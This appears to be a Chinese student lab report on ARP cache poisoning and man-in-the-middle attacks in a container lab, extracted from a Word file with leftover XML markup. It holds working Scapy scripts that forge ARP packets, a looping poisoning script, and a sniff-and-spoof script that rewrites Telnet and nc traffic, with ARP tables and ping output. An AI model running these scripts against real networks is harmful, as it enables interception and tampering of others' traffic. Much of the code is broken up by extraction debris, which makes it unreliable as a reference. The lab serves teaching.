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57118133 钟杰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#!/user/bin/env python3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E=Ether()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A=ARP()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A.op=1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A.psrc='10.9.0.6'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A.hw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rc='02:42:0a:09:00:69'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A.pdst='10.9.0.5'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pkt=E/A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sendp(pkt,iface='eth0')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攻击效果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10.9.0.6                 ether   02:42:0a:09:00:06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10.9.0.6                 ether   02:42:0a:09:00:69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10.9.0.105               ether   02:42:0a:09:00:69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将攻击代码中的op改为2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不在缓存中的情况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ip neigh flush dev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root@391c65f04666:/#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攻击效果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10.9.0.105               ether   02:42:0a:09:00:69   C                     eth0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攻击不成功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在缓存中的情况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10.9.0.105               ether   02:42:0a:09:00:69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10.9.0.6                 ether   02:42:0a:09:00:06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10.9.0.105               ether   02:42:0a:09:00:69   C                     eth0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#!/user/bin/env python3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E=Ether()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A=ARP()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A.op=1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A.psrc='10.9.0.6'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A.hwsrc='02:42:0a:09:00:69'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A.hwdst='ff:ff:ff:ff:ff:ff'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A.pdst='10.9.0.6'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E.dst='ff:ff:ff:ff:ff:ff'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pkt=E/A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sendp(pkt,iface='eth0')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不在缓存中的情况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ip neigh flush dev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攻击不成功，因为本来就没有对应ARP项所以ARP更新报文没有用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在缓存中的情况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10.9.0.6                 ether   02:42:0a:09:00:06   C                     eth0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root@391c65f04666:/# arp -n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                  HWtype  HWaddress           Flags Mask            Iface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10.9.0.6                 ether   02:42:0a:09:00:69   C                     eth0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对B的攻击代码就是将psrc和pdst交换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关闭M的IP转发后AB之间无法ping通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root@0f454df83b95:/# ping 10.9.0.5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 10.9.0.5 (10.9.0.5) 56(84) bytes of data.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^C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--- 10.9.0.5 ping statistics ---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packets transmitted, 0 received, 100% packet loss, time 4102ms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root@0f454df83b95:/#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开启M的ip转发后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>root@0f454df83b95:/# ping 10.9.0.5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 10.9.0.5 (10.9.0.5) 56(84) bytes of data.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bytes from 10.9.0.5: icmp_seq=1 ttl=63 time=0.292 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10.9.0.105: icmp_seq=2 Redirect Host(New nexthop: 10.9.0.5)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bytes from 10.9.0.5: icmp_seq=2 ttl=63 time=0.261 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10.9.0.105: icmp_seq=3 Redirect Host(New nexthop: 10.9.0.5)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bytes from 10.9.0.5: icmp_seq=3 ttl=63 time=0.448 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10.9.0.105: icmp_seq=4 Redirect Host(New nexthop: 10.9.0.5)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bytes from 10.9.0.5: icmp_seq=4 ttl=63 time=0.283 ms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10.9.0.105: icmp_seq=5 Redirect Host(New nexthop: 10.9.0.5)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bytes from 10.9.0.5: icmp_seq=5 ttl=63 time=0.259 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攻击成功，icmp报文发到了M上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开启M的ip转发功能，A通过Telnet连接B，然后关闭M的ip转发功能，执行sniff&amp;spoof，代码如下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IP_A = "10.9.0.5"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MAC_A = "02:42:0a:09:00:05"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IP_B = "10.9.0.6"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MAC_B = "02:42:0a:09:00:06"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spoof_pkt(pkt):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pkt[IP].src == IP_A and pkt[IP].dst == IP_B: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newpkt = IP(bytes(pkt[IP]))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del(newpkt.chksum)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del(newpkt[TCP].payload)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del(newpkt[TCP].chksum)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pkt[TCP].payload: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 = pkt[TCP].payload.load  # The original payload data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newdata = data.replace(b'a',b'A')  # No change is made in this sample code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send(newpkt/newdata)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elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A: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newpkt = IP(bytes(pkt[IP]))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del(newpkt.chksum)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del(newpkt[TCP].chksum)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'tcp and ((ether src 02:42:0a:09:00:05) or (ether src 02:42:0a:09:00:06))'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pkt = sniff(iface='eth0',filter=f,prn=spoof_pkt)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攻击效果如下，在A主机中输入的a都变成了A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seed@0f454df83b95:~$ AAAAAAA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在wireshark中更清楚地看到从A主机中发出的报文中数据字段为a，收到的报文变成A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66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675" cy="625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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>准备工作同task</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，建立n</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接后关闭主机M的转发功能，执行攻击代码，替换部分如下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scapy.all import*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IP_A = "10.9.0.5"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MAC_A = "02:42:0a:09:00:05"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IP_B = "10.9.0.6"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MAC_B = "02:42:0a:09:00:06"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spoof_pkt(pkt):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pkt[IP].src == IP_A and pkt[IP].dst == IP_B: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newpkt = IP(bytes(pkt[IP]))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del(newpkt.chksum)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del(newpkt[TCP].payload)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del(newpkt[TCP].chksum)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pkt[TCP].payload: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 = pkt[TCP].payload.load  # The original payload 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newdata = data.replace(b'a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',b'A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')  # No change is made in this sample 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send(newpkt/newdata)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elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A: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newpkt = IP(bytes(pkt[IP]))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del(newpkt.chksum)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del(newpkt[TCP].chksum)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send(newpkt)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'tcp and ((ether src 02:42:0a:09:00:05) or (ether src 02:42:0a:09:00:06))'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pkt = sniff(iface='eth0',filter=f,prn=spoof_pkt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但在实验过程中发现一旦n</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接上之后主机A</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会不定期且较为频繁地广播a</w:t>
      </w:r>
      <w:r>
        <w:t>rp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求询问对方i</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后a</w:t>
      </w:r>
      <w:r>
        <w:t>rp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存就会被纠正，因此要将先前的a</w:t>
      </w:r>
      <w:r>
        <w:t>rp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向攻击代码循环执行，如图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/user/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from scapy.all import*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def AtoB():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E=Ether(src='02:42:0a:09:00:69',dst='ff:ff:ff:ff:ff:ff')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A=ARP(op=1,psrc='10.9.0.6',hwsrc='02:42:0a:09:00:69',pdst='10.9.0.5')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pkt=E/A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sendp(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def BtoA():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E=Ether(src='02:42:0a:09:00:69',dst='ff:ff:ff:ff:ff:ff')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A=ARP(op=1,psrc='10.9.0.5',hwsrc='02:42:0a:09:00:69',pdst='10.9.0.6')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pkt=E/A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sendp(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>while(1):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AtoB()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BtoA()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time.sleep(3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击效果如下，可以看到在A主机输入a</w:t>
      </w:r>
      <w:r>
        <w:t>aa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在B主机显示的是A</w:t>
      </w:r>
      <w:r>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root@0f454df83b95:/# nc -lp 9090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root@391c65f04666:/# nc 10.9.0.6 9090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93DC1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A4193D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C0378F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AFC037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949A22"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="16949A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70176"/>
    <w:rsid w:val="6877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终结的电脑</dc:creator>
  <cp:lastModifiedBy>终结的电脑</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-19T02:14:22Z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